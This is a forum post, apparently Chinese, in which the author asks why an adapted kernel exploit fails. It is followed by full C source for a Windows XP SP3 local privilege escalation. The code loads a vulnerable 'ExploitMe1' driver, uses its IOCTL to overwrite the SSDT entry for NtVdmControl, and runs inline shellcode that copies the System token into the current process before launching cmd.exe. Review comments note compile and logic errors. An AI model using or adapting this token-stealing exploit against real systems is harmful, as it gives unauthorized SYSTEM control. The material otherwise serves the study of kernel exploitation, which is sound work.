我在网上搜到的代码,然后在其基础上修改的,是通过改写SSDT表中NtVdmControl的地址利用漏洞!
但是总是不能成功提权,用WinDbg调试的时候,在exploit1.sys派遣函数位置下断点,发现根本就执行不到。
泉哥建议我把代码发到论坛上面,他说会有很多人帮我的!希望各位朋友指教下,帮我看看这个代码哪里有问题!先在此谢过了。
#include <stdio.h>
#include <windows.h>
#pragma comment (lib, "ntdll.lib")
/* Native-API status type and the two codes spelled out below.
 * ntdll.lib is linked (see the pragma above), but the only native routine
 * actually called is resolved at run time with GetProcAddress in main(). */
typedef LONG NTSTATUS;
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) /* not referenced in this file */
/* Base-relocation entry (12-bit offset, 4-bit type). Not referenced in this file. */
typedef struct _IMAGE_FIXUP_ENTRY {
WORD offset:12;
WORD type:4;
} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;
/* Counted UTF-16 string as used by the native API. Not referenced in this file. */
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
/* Only one information class is declared; nothing in this file queries it. */
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation=11,
} SYSTEM_INFORMATION_CLASS;
/* Per-module record returned for information class 11. Declared but unused here. */
typedef struct _SYSTEM_MODULE_INFORMATION { // Information Class 11
ULONG Reserved[2];
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
/* File-scope pointer to ntdll!NtAllocateVirtualMemory, filled in by main()
 * via GetProcAddress. Declared without `static`, so it has external linkage.
 * BaseAddress and AllocationSize are IN OUT: the call may round both. */
NTSTATUS
(NTAPI *NtAllocateVirtualMemory)(
IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN ULONG ZeroBits,
IN OUT PULONG AllocationSize,
IN ULONG AllocationType,
IN ULONG Protect
);
/*
 * SetShellCodeToMemory
 *
 * Copies the machine code assembled inline between `call CopyXpShellCode`
 * and the `CopyXpShellCode:` label into ShellCodeMemory (the caller must
 * supply a writable buffer large enough for it; no size is passed or checked).
 *
 * - Terminates the process with ExitProcess(0) if the OS major version is not 5.
 * - Does nothing if the minor version is not 1: only an XP variant is provided.
 *
 * Every address and structure offset in the copied code is hard-coded for one
 * 32-bit XP build without the /3GB switch (see the "not 3G Mode" remark);
 * on any other build the offsets do not line up.
 */
VOID
SetShellCodeToMemory(
PVOID ShellCodeMemory
)
{
OSVERSIONINFOEX OsVersionInfo;
RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) );
OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
GetVersionEx ((OSVERSIONINFO *) &OsVersionInfo);
if ( OsVersionInfo.dwMajorVersion != 5 ) {
printf( "Not NT5 system\n" );
ExitProcess( 0 );
return; // unreachable: ExitProcess does not return
}
// The shellcode itself: performs the privilege elevation
if ( OsVersionInfo.dwMinorVersion == 1 ) {
__asm {
call CopyXpShellCode // pushes the address of the first nop, i.e. the start of the code to copy
nop // padding, part of the copied block
nop
nop
nop
nop
nop
mov eax, 0xFFDFF124 // eax = KPCR (not 3G Mode)
mov eax, [eax]
mov esi, [eax+0x220] // esi = current process (per the +0xc8 write below)
mov eax, esi
searchXp: // walk the list at +0x88 until the field at +0x84 equals 4
mov eax, [eax+0x88]
sub eax, 0x88
mov edx, [eax+0x84]
cmp edx, 0x4 // Find System Process
jne searchXp
mov eax, [eax+0xc8] // read the System process's token
mov [esi+0xc8], eax // overwrite the current process's token with it to elevate the current process
ret 8 // pops the two dword arguments the caller in main() pushes before the call
CopyXpShellCode:
pop esi // esi = return address = first byte of the block above
mov edi, ShellCodeMemory // destination buffer supplied by the caller
lea ecx, CopyXpShellCode
sub ecx, esi // ecx = byte length of the block (label minus start)
cld
rep movsb // copy ecx bytes from esi to edi
}
}
}
/*
 * main
 *
 * Program entry point. Everything is hard-coded for a single build: the
 * service/driver name "exploit1" / "\\.\ExploitMe1", IOCTL 0x8888A003, and
 * HookAddress 0x80502FBC (annotated "xp sp3"). Steps as written:
 *   1. open the SCM, open and start the "exploit1" service (already-running
 *      is tolerated), then release both service handles;
 *   2. resolve NtAllocateVirtualMemory and ZwVdmControl from ntdll.dll;
 *   3. allocate MemorySize bytes of PAGE_EXECUTE_READWRITE memory at the
 *      requested base 0x200 (both values are IN OUT and may be adjusted);
 *   4. fill the region with 0x90, write the 4 bytes 00 02 00 00 at its start
 *      and copy the shellcode at +0x200;
 *   5. open the device and issue the same DeviceIoControl twice with a NULL
 *      input buffer and HookAddress as the output buffer (return values unchecked);
 *   6. call through ZwVdmControl with two zero arguments, then CreateProcess("cmd.exe").
 *
 * Returns 0 on every early-exit path; falls off the end after CreateProcess.
 * The PROCESS_INFORMATION handles in `pi` are never closed.
 */
int main(int argc, char* argv[])
{
NTSTATUS status;
PVOID ZwVdmControl = NULL;
DWORD HookAddress = 0x80502FBC; //xp sp3
PVOID ShellCodeMemory = (PVOID)0x200; // requested base; updated in place by NtAllocateVirtualMemory
DWORD MemorySize = 0x1000; // requested size; updated in place by NtAllocateVirtualMemory
HANDLE deviceHandle;
DWORD dwReturnSize = 0;
SC_HANDLE hscmHandle = NULL;
SC_HANDLE hscDriver = NULL;
PROCESS_INFORMATION pi;
STARTUPINFOA stStartup;
PVOID InputBuffer = NULL;
printf( "\t----Windows Local Privilege Escalation Vulnerability Exploit----\n" );
// Load and start the driver
// NOTE(review): this and the later `printf( "` literals are split across two
// lines as the page shows them (presumably a "\n" escape lost in rendering);
// as written they are unterminated string literals and will not compile.
printf( "
Connect SCM ... " );
hscmHandle = OpenSCManager ( NULL, NULL, GENERIC_READ | SERVICE_START );
if ( NULL == hscmHandle ) {
printf( "failed, code: %d\n", GetLastError() ); // NOTE(review): GetLastError() is a DWORD; %lu matches, %d does not
return 0;
}
printf( "success!!\n" );
printf( "
Open services ... " );
hscDriver = OpenService( hscmHandle, "exploit1", GENERIC_READ | SERVICE_START );
if ( NULL == hscDriver ) {
printf( "failed, code: %d\n", GetLastError() );
CloseServiceHandle ( hscmHandle );
return 0;
}
printf( "success!!\n" );
printf( "
Start services ... " );
//
// Start the ExploitMe1 driver
//
if ( !StartService( hscDriver, 0, NULL ) ) {
// an already-running service is not treated as a failure
if ( ERROR_SERVICE_ALREADY_RUNNING != GetLastError() ) {
printf( "failed, code: %d\n", GetLastError() );
CloseServiceHandle ( hscDriver );
CloseServiceHandle ( hscmHandle );
return 0;
}
}
printf( "success!!\n" );
CloseServiceHandle ( hscDriver );
CloseServiceHandle ( hscmHandle );
// Resolve the native allocator at run time (the cast spells out the pointer type declared above).
NtAllocateVirtualMemory = (long (__stdcall *)(void *,void ** ,unsigned long,unsigned long *,unsigned long,unsigned long))GetProcAddress( LoadLibrary("ntdll.dll"), "NtAllocateVirtualMemory" );
if ( NtAllocateVirtualMemory == NULL ) {
// NOTE(review): the format string has a %d but no argument is passed (undefined
// behaviour; prints garbage). GetLastError() was presumably intended.
printf( "GetProcAddress failed, code: %d\n" );
return 0;
}
// NOTE(review): the result is not checked for NULL before being called below.
ZwVdmControl = GetProcAddress( LoadLibrary("ntdll.dll"), "ZwVdmControl" );
printf( "
Create execute environment ... " );
// (HANDLE)-1 is the current process. ShellCodeMemory and MemorySize are IN OUT
// and hold the actual base/size after the call.
status = NtAllocateVirtualMemory( (HANDLE)-1,
&ShellCodeMemory,
0,
&MemorySize,
MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,
PAGE_EXECUTE_READWRITE );
if ( status != STATUS_SUCCESS ) {
printf( "failed!\n[-] NtAllocateVirtualMemory failed, status: %08X\n", status );
return 0;
}
printf( "Ok!\n" );
//
// Initialise the shellcode buffer
//
memset( ShellCodeMemory, 0x90, MemorySize ); // fill the whole region with NOPs
// first four bytes: 00 02 00 00 (little-endian 0x00000200)
memset( ShellCodeMemory, 0x00, 0x1 );
memset( ((byte*)ShellCodeMemory+1), 0x02, 0x1 );
memset( ((byte*)ShellCodeMemory+2), 0x00, 0x1 );
memset( ((byte*)ShellCodeMemory+3), 0x00, 0x1 );
// copy the shellcode 0x200 bytes into the region
SetShellCodeToMemory( (PVOID)((DWORD)ShellCodeMemory + 0x200) );
deviceHandle = CreateFile("\\\\.\\ExploitMe1",
0,
FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL);
if ( INVALID_HANDLE_VALUE == deviceHandle ) {
printf( "[-] Open device failed, code: %d\n", GetLastError() );
return 0;
} else {
printf( "
Open device success\n" ); }
//__asm int 3
// NOTE(review): the return value and dwReturnSize of both calls are ignored.
DeviceIoControl( deviceHandle,
0x8888A003,
InputBuffer,
// a zero address is passed here; its content is the shellcode start address 0x00000200
0x4,
(PVOID)HookAddress,
0x4,
&dwReturnSize,
NULL );
//__asm int 3
DeviceIoControl( deviceHandle,
0x8888A003,
InputBuffer,
0x4,
(PVOID)HookAddress,
// this address gets the value 0x00000200 written into it
0x4,
&dwReturnSize,
NULL );
CloseHandle( deviceHandle );
// The SSDT entry for ZwVdmControl has been overwritten with the shellcode address, so calling it runs the shellcode
printf( "
call shellcode ... " );
__asm
{
xor ecx,ecx
push ecx // two zero dword arguments, matching the `ret 8` in the shellcode
push ecx
mov eax, ZwVdmControl
call eax
}
printf( "Done.\n" );
printf( "
Create New Process\n" );
GetStartupInfo( &stStartup );
// This process now holds SYSTEM privileges, so the process created here should too
// NOTE(review): the return value is not checked and pi's handles are never closed.
CreateProcess( NULL,
"cmd.exe",
NULL,
NULL,
TRUE,
NULL,
NULL,
NULL,
&stStartup,
&pi );
}